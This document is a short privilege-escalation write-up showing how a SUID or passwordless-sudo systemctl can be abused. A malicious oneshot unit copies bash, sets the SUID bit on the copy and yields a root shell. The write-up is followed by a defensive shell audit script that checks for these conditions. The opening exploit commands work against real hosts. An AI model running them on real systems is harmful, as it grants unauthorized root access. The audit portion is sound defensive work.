If systemctl is SUID root, then a malicious service file can easily be abused to create a root shell.

FILE=`mktemp -u`

# Write a one-shot unit into a location we control; systemd will run its
# ExecStart lines as root once the unit is linked and started.
cat > ${FILE}.service << EOF
[Service]
Type=oneshot
ExecStart=/bin/cp /bin/bash ${FILE}.sh
ExecStart=/bin/chmod +xs ${FILE}.sh

[Install]
WantedBy=multi-user.target
EOF

# Link the unit from its current path rather than copying it into /etc/systemd.
systemctl link ${FILE}.service
systemctl start ${FILE}.service

${FILE}.sh -p # Root! (-p keeps the SUID effective uid instead of dropping it)

Even if systemctl is not SUID root, the same trick still works as long as you have NOPASSWD sudo access to it.
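The three conditions the write-up relies on (a SUID systemctl, a passwordless sudo rule covering it, and a linked unit that points outside the normal unit directories) are all things an administrator can check for. The following POSIX shell audit is an added example and is not part of the original snippet; the `/usr/bin/systemctl`, `/etc/sudoers` and `/etc/systemd/system` paths it checks by default are assumptions about a typical Linux layout, and the sudoers text in the demo at the bottom is constructed.

```sh
#!/bin/sh
# Added audit example (not from the original write-up).
# Default paths below are assumptions for a typical systemd-based distribution.

# Return 0 if the file has the setuid bit set (the first condition in the write-up).
is_suid_file() {
    [ -u "$1" ]
}

# Return 0 if a sudoers-format file grants a NOPASSWD rule that covers systemctl,
# either by naming systemctl explicitly or by granting ALL. Comment lines are
# skipped so that a commented-out rule does not trigger a finding.
sudoers_grants_nopasswd_systemctl() {
    grep -v '^[[:space:]]*#' "$1" \
        | grep -Eq 'NOPASSWD:.*(systemctl|(^|[^[:alnum:]_])ALL([^[:alnum:]_]|$))'
}

# Print every *.service symlink in a unit directory whose target lies outside the
# standard unit locations. "systemctl link" creates exactly such symlinks, so a
# link pointing into /tmp or a home directory is worth a closer look.
list_foreign_unit_links() {
    dir="$1"
    for link in "$dir"/*.service; do
        [ -L "$link" ] || continue
        target=$(readlink "$link")
        case "$target" in
            /etc/systemd/*|/usr/lib/systemd/*|/lib/systemd/*|/run/systemd/*) ;;
            *) printf '%s -> %s\n' "$link" "$target" ;;
        esac
    done
}

# Run all three checks against the live host (paths are assumptions).
audit_host() {
    bin=${1:-/usr/bin/systemctl}
    sudoers=${2:-/etc/sudoers}
    units=${3:-/etc/systemd/system}

    if is_suid_file "$bin"; then
        echo "FINDING: $bin is setuid"
    else
        echo "ok: $bin is not setuid"
    fi

    if [ -r "$sudoers" ]; then
        if sudoers_grants_nopasswd_systemctl "$sudoers"; then
            echo "FINDING: $sudoers has a NOPASSWD rule covering systemctl"
        else
            echo "ok: no NOPASSWD rule covering systemctl in $sudoers"
        fi
    else
        echo "skip: $sudoers not readable (re-run as root)"
    fi

    foreign=$(list_foreign_unit_links "$units")
    if [ -n "$foreign" ]; then
        echo "FINDING: unit symlinks pointing outside standard unit directories:"
        echo "$foreign"
    else
        echo "ok: no foreign unit symlinks in $units"
    fi
}

# Constructed demo input so the script shows output offline: a sample sudoers
# fragment (not a real host's file) run through the sudoers check.
demo_sudoers=$(mktemp)
cat > "$demo_sudoers" <<'EOF'
# constructed sample sudoers fragment
root  ALL=(ALL) ALL
alice ALL=(ALL) NOPASSWD: /usr/bin/systemctl
EOF
if sudoers_grants_nopasswd_systemctl "$demo_sudoers"; then
    echo "demo: constructed sudoers sample would be flagged"
fi
rm -f "$demo_sudoers"

audit_host
```

Run it as root so `/etc/sudoers` is readable; `audit_host` also accepts explicit paths (`audit_host /bin/systemctl /etc/sudoers.d/local /etc/systemd/system`) for checking drop-in files one at a time. The symlink check only covers the top-level `*.service` entries of one directory, so it is a starting point rather than a full inventory of unit sources.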